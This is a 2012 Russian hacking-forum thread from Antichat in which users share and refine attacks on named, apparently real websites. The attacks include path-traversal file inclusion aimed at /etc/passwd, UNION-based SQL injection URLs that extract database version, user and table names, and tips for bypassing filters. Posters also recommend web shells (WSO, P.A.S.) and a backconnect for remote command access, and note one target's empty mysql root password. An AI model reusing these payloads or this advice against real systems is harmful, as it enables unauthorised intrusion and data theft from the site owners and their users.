ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.12.2012, 08:30
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от herfleisch
herfleisch said:
http://mreseo.com/hosting.php?id=../../../../../../../../../../../etc/passwd////[4096 слешей]////.
Если у Вас используется php >5.3, то там данная дыра уже закрыта
MQ=Off ??
_ttp://mreseo.com/hosting.php?id=../123.php%00
Так что вернёт ???
Сообщение от None
Полагаю для /proc/self недостаточно привилегий.
На основании чего такие предположения ?
|
|
|
19.12.2012, 17:35
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Если у Вас используется php >5.3, то там данная дыра уже закрыта
MQ=Off ??
_ttp://mreseo.com/hosting.php?id=../123%00
Так что вернёт ???
На основании чего такие предположения ?
Скорее всего юзер ограничен своей директорией.
Код:
Code:
/home/content/28/9889628/html/mreseo/
Код:
Code:
?id=../123%00
Failed opening 'pages/../123\0.php'
|
|
|
|
19.12.2012, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Сообщение от qwwertty
qwwertty said:
Скорее всего юзер ограничен своей директорией.
Код:
Code:
/home/content/28/9889628/html/mreseo/
Код:
Code:
?id=../123%00
Failed opening 'pages/../123\0.php'
Причем здесь ограничения в директории? Ответ уже был дан: версия php 5.3, ////4096/// не прокатит, как и %00 из-за настрек в php.ini, поэтому расширение .php вы не как не отбросите.
ПРУФ: ?id=../index
|
|
|
|
19.12.2012, 20:41
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301
Репутация:
0
|
|
Ещё интересна возможность раскрутки такой скули.
Код:
Code:
_ttps://www.trimaxcloud.com/partner.php?id=7'&idsub=39'
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей
Код:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp2\www\partner.php on line 10
По тому же дорку:
Код:
Code:
_ttp://www.tcilmanagedservices.com/partner.php?id=7'&idsub=39'
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу. |
|
|
|
20.12.2012, 13:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Вот нашел скрипт, позволяющий, как мне кажется то-ли залить файл на сервер, то-ли запустить скрипт.
Но моих познаний явно не хватает для оценки его возможностей:
Код:
Code:
0)
$c = ' $(function() { $("select[name=type]").val ('.$CURUSER['cs_last_type'].') });
';
$c .='
Заголовок:
Тип:
'.$o.'
Отрывок:
';
$title = 'Добавить код';
}
else
{
$text = $_POST['text'];
$title = strip_tags ($_POST['title']);
$type = intval ($_POST['type']);
include ('include/geshi.php');
$language = strtolower ($types[$type]);
$path = 'include/geshi/';
$geshi = new GeSHi($text, $language, $path);
$geshi->enable_line_numbers (GESHI_FANCY_LINE_NUMBERS);
$geshi->set_tab_width (4);
$hltext = $geshi->parse_code();
sql_query ("INSERT INTO `codeshare` SET
`title` = ".sqlesc ($title).",
`user_id` = ".$CURUSER['id'].",
`type` = ".$type.",
`size` = ".mb_strlen ($text)."
");
$id = mysql_insert_id ();
sql_query ("INSERT INTO `codeshare_data` SET
`id` = ".$id.",
`text` = ".sqlesc (htmlspecialchars ($text, ENT_COMPAT, 'UTF-8')).",
`hltext` = ".sqlesc ($hltext)."
");//or die (mysql_error ());
sql_query ('UPDATE `users` SET `cs_last_type` = '.$type.' WHERE `id` = '.$CURUSER['id']);
header ('Location: /codeshare.php?id='.$id);
die ();
}
?>
Если он может выполнять другой код, то мне достаточно провести инъекцию и выполнить ее используя этот скрипт.
Подскажите, как это сделать, или укажите утилиту, которая может проанализировать код на уязвимость
Спасибо |
|
|
|
20.12.2012, 14:05
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qwwertty
qwwertty said:
Кавычки экранирует, вывода нет.
Всё что есть - раскрытие путей
Бред пишешь.
_ttps://www.trimaxcloud.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+
_ttp://www.tcilmanagedservices.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1, @@version,3,4+--+
Сообщение от None
P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.
Тем же WSO сделай бэкконект и сиди со своей консольки.
Ещё как альтернативу юзаю P.A.S. шелл.
|
|
|
|
20.12.2012, 17:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Есть SQLi
Код:
Code:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю
Сообщение от None
Incorrect database name 'mysql.o'
Не могу вкурить в чем проблема |
|
|
|
20.12.2012, 17:28
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от WendM
WendM said:
Есть SQLi
Код:
Code:
http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+
В ответ получаю
Не могу вкурить в чем проблема _ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
|
|
|
|
20.12.2012, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от BigBear
BigBear said:
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
_http://www.lory-press.ru/showreview.php?id=9999999999999.9+order+by+4+--+
А почему тут не фильтруется?
|
|
|
|
20.12.2012, 18:08
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+dual+--+
Вердикт неутешителен - фильтруется "точка"
Замены типа %2e и %252e не помогают.
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Пруф>>>
_tp://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,u ser%28%29,3,4+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
